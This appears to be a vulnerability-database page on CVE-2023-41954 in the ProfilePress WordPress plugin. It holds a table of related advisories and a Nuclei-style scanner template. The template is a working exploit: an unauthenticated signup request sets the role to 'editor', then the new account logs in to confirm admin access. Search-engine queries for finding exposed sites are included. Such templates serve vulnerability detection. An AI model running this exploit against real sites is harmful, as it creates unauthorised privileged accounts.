| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2023-41954 | 29 Nov 202523:34 | – | circl | |
| WordPress plugin ProfilePress 安全漏洞 | 17 May 202400:00 | – | cnnvd | |
| CVE-2023-41954 | 17 May 202406:54 | – | cve | |
| CVE-2023-41954 WordPress ProfilePress plugin <= 4.13.1 - Unauthenticated Limited Privilege Escalation vulnerability | 17 May 202406:54 | – | cvelist | |
| EUVD-2023-46413 | 3 Oct 202520:07 | – | euvd | |
| CVE-2023-41954 | 17 May 202407:15 | – | nvd | |
| WordPress ProfilePress Plugin < 4.13.2 Multiple Vulnerabilities | 5 Feb 202500:00 | – | openvas | |
| CVE-2023-41954 | 17 May 202407:15 | – | osv | |
| WordPress ProfilePress Plugin <= 4.13.1 is vulnerable to Privilege Escalation | 12 Sep 202300:00 | – | patchstack | |
| PT-2024-13020 · Unknown · Profilepress | 17 May 202400:00 | – | ptsecurity |
id: CVE-2023-41954
info:
name: ProfilePress <= 4.13.1 — Unauthenticated Privilege Escalation
author: daffainfo
severity: high
description: |
Improper Privilege Management vulnerability in ProfilePress Membership Team ProfilePress allows Privilege Escalation.This issue affects ProfilePress: from n/a through 4.13.1.
remediation: |
Update to the latest version of ProfilePress to address privilege management issues.
impact: |
Attackers can escalate privileges, gaining unauthorized access to restricted features or data within ProfilePress.
reference:
- https://patchstack.com/database/vulnerability/wp-user-avatar/wordpress-profilepress-plugin-4-13-1-unauthenticated-limited-privilege-escalation-vulnerability?_s_id=cve
- https://infosecwriteups.com/cve-2023-41954-profilepress-4-13-1-unauthenticated-privilege-escalation-fa781b778d59
- https://nvd.nist.gov/vuln/detail/CVE-2023-41954
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L
cvss-score: 8.6
cve-id: CVE-2023-41954
epss-score: 0.01397
epss-percentile: 0.69133
cwe-id: CWE-269
cpe: cpe:2.3:a:properfraction:profilepress:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: properfraction
product: profilepress
framework: wordpress
fofa-query: body="/wp-content/plugins/wp-user-avatar/"
publicwww-query: "/wp-content/plugins/wp-user-avatar/"
shodan-query: http.component:"profilepress"
tags: cve,cve2023,wordpress,wp,wp-plugin,properfraction,profilepress,vkev
flow: http(1) && http(2)
variables:
user: "{{rand_base(6)}}"
pass: "{{rand_base(8)}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
firstname: "{{rand_base(5)}}"
lastname: "{{rand_base(5)}}"
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoO03YbuBltnemvPe
------WebKitFormBoundaryoO03YbuBltnemvPe
Content-Disposition: form-data; name="reg_username"
{{user}}
------WebKitFormBoundaryoO03YbuBltnemvPe
Content-Disposition: form-data; name="reg_email"
{{email}}
------WebKitFormBoundaryoO03YbuBltnemvPe
Content-Disposition: form-data; name="reg_password"
{{pass}}
------WebKitFormBoundaryoO03YbuBltnemvPe
Content-Disposition: form-data; name="reg_password_present"
true
------WebKitFormBoundaryoO03YbuBltnemvPe
Content-Disposition: form-data; name="reg_first_name"
{{firstname}}
------WebKitFormBoundaryoO03YbuBltnemvPe
Content-Disposition: form-data; name="reg_last_name"
{{lastname}}
------WebKitFormBoundaryoO03YbuBltnemvPe
Content-Disposition: form-data; name="_wp_http_referer"
/
------WebKitFormBoundaryoO03YbuBltnemvPe
Content-Disposition: form-data; name="pp_current_url"
{{BaseURL}}
------WebKitFormBoundaryoO03YbuBltnemvPe
Content-Disposition: form-data; name="signup_form_id"
{{signup_form_id}}
------WebKitFormBoundaryoO03YbuBltnemvPe
Content-Disposition: form-data; name="signup_referrer_page"
------WebKitFormBoundaryoO03YbuBltnemvPe
Content-Disposition: form-data; name="reg_select_role"
editor
------WebKitFormBoundaryoO03YbuBltnemvPe
Content-Disposition: form-data; name="action"
pp_ajax_signup
------WebKitFormBoundaryoO03YbuBltnemvPe
Content-Disposition: form-data; name="melange_id"
------WebKitFormBoundaryoO03YbuBltnemvPe--
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains_all(body, "profilepress-reg-status success", "Registration successful.")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{user}}&pwd={{pass}}&wp-submit=Log+In
- |
GET /wp-admin/edit.php?post_type=page HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "Filter pages list", "Add Page")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022040a01272ca855a1701a84e31243e6d729d066b916feeedb3cd2a057653e698f3022100e69d6186be39490245b6bf62bbfcb24fdee4430e222a1ae23455a88c544cfe2a:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation